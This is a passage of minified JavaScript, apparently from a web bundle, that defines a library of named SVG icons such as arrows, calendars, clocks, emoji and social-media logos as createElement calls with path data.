24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m6 9 6 6 6-6"})),arrow_left_backward_circle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M11 15.5 7.5 12m0 0L11 8.5M7.5 12h9"})),arrow_left_backward_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 20.5 3.5 12m0 0L12 3.5M3.5 12h17"})),arrow_left_forward_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m12 20.5 8.5-8.5m0 0L12 3.5m8.5 8.5h-17"})),arrow_left_previous_backward_chevron_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m15 18-6-6 6-6"})),arrow_move_down_left_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M22 6v3a4 4 0 0 1-4 4H2m0 0 5 5m-5-5 5-5"})),arrow_move_down_right_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 6v3a4 4 0 0 0 4 4h16m0 0-5 5m5-5-5-5"})),arrow_move_up_left_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M22 18v-3a4 4 0 0 0-4-4H2m0 0 5-5m-5 5 5 5"})),arrow_move_up_right_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 18v-3a4 4 0 0 1 4-4h16m0 0-5-5m5 5-5 5"})),arrow_right_forward_circle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m13 8.5 3.5 3.5m0 0L13 15.5m3.5-3.5h-9"})),arrow_right_next_forward_chevron_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m9 18 6-6-6-6"})),arrow_up_dropdown_minimize_chevron_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m18 15-6-6-6 6"})),arrow_up_top_left_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6 18V6m0 0h12M6 6l12 12"})),arrow_up_top_right_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M18 18V6m0 0H6m12 0L6 18"})),arrow_up_top_upward_circle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8.5 11 12 7.5m0 0 3.5 3.5M12 7.5v9"})),arrow_up_top_upward_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3.5 12 12 3.5m0 0 8.5 8.5M12 3.5v17"})),at_a_mail_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M16 8v7a2 2 0 0 0 2 2 4 4 0 0 0 4-4v-1c0-5.523-4.477-10-10-10S2 6.477 2 12s4.477 10 10 10c1.821 0 3.53-.487 5-1.338M16 12a4 4 0 1 1-8 0 4 4 0 0 1 8 0Z"})),author_user_human_1_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("circle",{cx:"12",cy:"7",r:"4",stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M4.5 20.533A6.533 6.533 0 0 1 11.033 14h1.934a6.533 6.533 0 0 1 6.533 6.533.467.467 0 0 1-.467.467H4.967a.467.467 0 0 1-.467-.467Z"})),author_user_human_2_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M16.5 8a4.5 4.5 0 1 1-9 0 4.5 4.5 0 0 1 9 0Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 20.5a8 8 0 1 0-16 0"})),author_user_human_3_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("circle",{cx:"12",cy:"7",r:"4",stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M4 21v-3a4 4 0 0 1 4-4h8a4 4 0 0 1 4 4v3"})),author_user_human_4_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("circle",{cx:"12",cy:"7",r:"4",stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 13.5c-3.283 0-6.156 1.585-7.728 3.776C2.984 19.07 4.791 21 7 21h10c2.209 0 4.015-1.93 2.727-3.724C18.155 15.086 15.283 13.5 12 13.5Z"})),book_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M4 5v14a3 3 0 0 0 3 3h13V8H7a3 3 0 0 1-3-3Zm0 0a3 3 0 0 1 3-3h13M7 5h10"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M9.5 18.5v-3.092a3 3 0 0 1 .504-1.664l1.219-1.828a.934.934 0 0 1 1.554 0l1.22 1.828a3 3 0 0 1 .503 1.664V18.5m-5-2.5h5"})),book_reading_time_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M7 19h9M4 19V7a3 3 0 0 1 3-3h3M4 19a3 3 0 0 0 3 3h11M4 19a3 3 0 0 1 3-3h11v-4"}),(0,o.createElement)("circle",{cx:"14.5",cy:"7.5",r:"5.5",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M14.5 5v3l2 1"})),calendar_date_1_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5.5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2v-14ZM8 2v3m8-3v3M3 9h18M8 13.5h.01M8 17h.01M12 13.5h.01M12 17h.01M16 13.5h.01M16 17h.01"})),calendar_date_2_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6 3h15v16a2 2 0 0 1-2 2H8a2 2 0 0 1-2-2v-1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6 3h15l-3.595 13.032a2 2 0 0 1-1.928 1.468H3.313a1 1 0 0 1-.964-1.266L6 3Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M11 13.5 12.5 8l-2 1m-1 4.5h3m4-12-.5 3m-2.5-3-.5 3m-2.5-3-.5 3"})),calendar_date_3_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5.5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2v-14ZM8 2v3m8-3v3M3 9h18"})),calendar_date_4_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5.5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2v-14ZM7.5 2v3M12 2v3m4.5-3v3M8 13.5h.01M8 10h.01M8 17h.01M12 13.5h.01M12 10h.01M12 17h.01M16 13.5h.01M16 10h.01M16 17h.01"})),caret_up_top_triangle_angle_arrow_upward_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12.8 6.067a1 1 0 0 0-1.6 0l-7 9.333A1 1 0 0 0 5 17h14a1 1 0 0 0 .8-1.6l-7-9.333Z"})),category_book_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M4 5v14a3 3 0 0 0 3 3h13V8H7a3 3 0 0 1-3-3Zm0 0a3 3 0 0 1 3-3h13M7 5h10"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 11h-5v3h5M7.5 15.5h3m-3 3h3"})),category_file_documents_1_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M16.5 7H5a2 2 0 1 1 0-4h16v6.5L19.5 11v7h-3"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5v16h13.5V7m-10 7.5h3m-3 3h3"})),category_file_documents_2_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M5 20h16a1 1 0 0 0 1-1V8a1 1 0 0 0-1-1H6a1 1 0 0 0-1 1v12Zm0 0H4a2 2 0 0 1-2-2V6a2 2 0 0 1 2-2h11.172a2 2 0 0 1 1.414.586L19 7"})),category_file_documents_3_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M21 20H6a1 1 0 0 1-1-1v-8a1 1 0 0 1 1-1h7.586a1 1 0 0 0 .707-.293l2.414-2.414A1 1 0 0 1 17.414 7H21a1 1 0 0 1 1 1v11a1 1 0 0 1-1 1Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M20 7V5a1 1 0 0 0-1-1h-3.586a1 1 0 0 0-.707.293l-2.414 2.414a1 1 0 0 1-.707.293H3a1 1 0 0 0-1 1v9a1 1 0 0 0 1 1h2"})),category_file_documents_4_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 20V5a1 1 0 0 1 1-1h5.586a1 1 0 0 1 .707.293L11.5 6.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8 6.5h10a2 2 0 0 1 2 2V11M6 11l-4 9h16l4-9H6Z"})),clock_reading_time_1_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M22 12c0 5.523-4.477 10-10 10S2 17.523 2 12 6.477 2 12 2s10 4.477 10 10Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 6v6l4 2"})),clock_reading_time_2_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M12 2v1.5M2 12h1.5M12 22v-1.5M22 12h-1.5M13 13 9.5 9.5M11 13l5-5"})),clock_reading_time_3_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 13.5V16a6 6 0 0 1-6 6H2v-7a6 6 0 0 1 6-6h1"}),(0,o.createElement)("circle",{cx:"15.5",cy:"8.5",r:"6.5",stroke:"currentColor",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M15.5 5.111V9l2 1.111M6 15h3m-3 3h7"})),confused_emoji_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8.5 10v1.5m7-1.5v1.5M9 17c.778-.839 3.267-2.516 7-1.845"})),correct_save_check_circle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M22 12c0 5.523-4.477 10-10 10S2 17.523 2 12 6.477 2 12 2s10 4.477 10 10Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m8 12.5 2.5 2.5L16 9"})),correct_save_check_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m4.5 13 5 5 10-12"})),cross_close_x_minimize_circle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m8 8 8 8m0-8-8 8"})),cross_x_close_minimize_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"m6 6 6 6m0 0 6 6m-6-6 6-6m-6 6-6 6"})),desktop_monitor_computer_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 3H4a2 2 0 0 0-2 2v10a2 2 0 0 0 2 2h16a2 2 0 0 0 2-2V5a2 2 0 0 0-2-2ZM8 21h8m-4-4v4m0-7.5h.01"})),dot_circle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 2C6.477 2 2 6.477 2 12s4.477 10 10 10 10-4.477 10-10S17.523 2 12 2Z",clipRule:"evenodd"})),download_1_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 15v4c0 1.1.9 2 2 2h14a2 2 0 0 0 2-2v-4m-4-6-5 5-5-5m5 3.8V2.5"})),download_2_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M7.822 8.067A5 5 0 0 0 6 17.9m12.633-5.658A7 7 0 1 0 5.248 8.147M19 9.756a4.502 4.502 0 0 1-.195 8.552M12 13v8m0 0-2.5-2.5M12 21l2.5-2.5"})),facebook_logo_icon_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M16.5 8H14a2 2 0 0 0-2 2v11m-2-7h5"})),google_logo_icon_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"m21.882 10.459-.103-.428h-9.485v3.938h5.667c-.588 2.741-3.318 4.184-5.549 4.184-1.623 0-3.333-.67-4.465-1.746a6.25 6.25 0 0 1-1.4-2.021 6.152 6.152 0 0 1-.502-2.393c0-1.66.76-3.318 1.865-4.41 1.106-1.091 2.776-1.702 4.437-1.702 1.902 0 3.264.99 3.774 1.442l2.853-2.784C18.137 3.818 15.838 2 12.254 2 9.49 2 6.84 3.039 4.903 4.933 2.99 6.8 2 9.497 2 12s.937 5.066 2.79 6.946C6.77 20.952 9.574 22 12.46 22c2.627 0 5.117-1.01 6.892-2.842 1.745-1.803 2.647-4.3 2.647-6.915 0-1.101-.113-1.755-.118-1.784Z"})),growth_increase_up_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m20.2 7.8-7.7 7.7-4-4-5.7 5.7"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M15 7h6v6"})),hamicon_5_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M5 13a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm7 0a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm7 0a1 1 0 1 0 0-2 1 1 0 0 0 0 2ZM5 6a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm7 0a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm7 0a1 1 0 1 0 0-2 1 1 0 0 0 0 2ZM5 20a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm7 0a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm7 0a1 1 0 1 0 0-2 1 1 0 0 0 0 2Z"})),hamicon_6_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 13a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm0-7a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm0 14a1 1 0 1 0 0-2 1 1 0 0 0 0 2Z"})),happy_emoji_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8.5 8v1.5m7-1.5v1.5M12 18a5 5 0 0 0 5-5H7a5 5 0 0 0 5 5Z"})),heart_love_wishlist_favourite_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m4.098 13.848 7.52 7.519a.542.542 0 0 0 .765 0l7.52-7.52a5.678 5.678 0 0 0 0-8.028 5.047 5.047 0 0 0-7.138 0l-.711.71a.076.076 0 0 1-.107 0l-.711-.71a5.047 5.047 0 0 0-7.138 0 5.678 5.678 0 0 0 0 8.029Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M16.334 7.48c.553 0 1.107.21 1.53.633.547.548.78 1.292.695 2.006"})),hemicon_1_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M4 5h16M4 12h11.5M4 19h16"})),hemicon_2_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M4 5h16M4 12h16M4 19h16"})),hemicon_3_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M4 5h16M4 12h11.5M4 19h8"})),hidden_hide_invisible_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M17.862 5.999c-1.61-1.148-3.576-2-5.86-2-7 0-11 8-11 8s1.764 3.529 5 5.899m3 1.596a9.213 9.213 0 0 0 3 .505c7 0 11-8 11-8s-.867-1.734-2.5-3.587"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M14 9.764A3 3 0 0 0 9.764 14m5.21-1.601a3.002 3.002 0 0 1-2.59 2.577M3.6 20.4 20.4 3.6"})),home_house_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"m3.671 9.403 7-6.222a2 2 0 0 1 2.658 0l7 6.222A2 2 0 0 1 21 10.898V19a2 2 0 0 1-2 2h-3.5a1 1 0 0 1-1-1v-5a1 1 0 0 0-1-1h-3a1 1 0 0 0-1 1v5a1 1 0 0 1-1 1H5a2 2 0 0 1-2-2v-8.102a2 2 0 0 1 .671-1.495Z"})),hourglass_timer_time_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6 2v4.93a2 2 0 0 0 .89 1.664l4.555 3.036a1 1 0 0 0 1.11 0l4.554-3.036A2 2 0 0 0 18 6.93V2M6 22v-4.93a2 2 0 0 1 .89-1.664l4.555-3.036a1 1 0 0 1 1.11 0l4.554 3.036A2 2 0 0 1 18 17.07V22"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M4 2h16M4 22h16M9.5 19.5h5M11 17h2"})),instagram_logo_icon_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Z"}),(0,o.createElement)("circle",{cx:"12",cy:"12",r:"4",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"2",d:"M17 7h.01"})),laptop_computer_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3.5 6a2 2 0 0 1 2-2h13a2 2 0 0 1 2 2v10h-17V6Zm7 1h3M2 16h20v2a2 2 0 0 1-2 2H4a2 2 0 0 1-2-2v-2Z"})),left_align_1_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M3 3h18M3 21h8m-8-6h18M3 9h8"})),left_triangle_angle_arrow_backward_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6.067 12.8a1 1 0 0 1 0-1.6l9.333-7A1 1 0 0 1 17 5v14a1 1 0 0 1-1.6.8l-9.333-7Z"})),linkedin_logo_icon_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 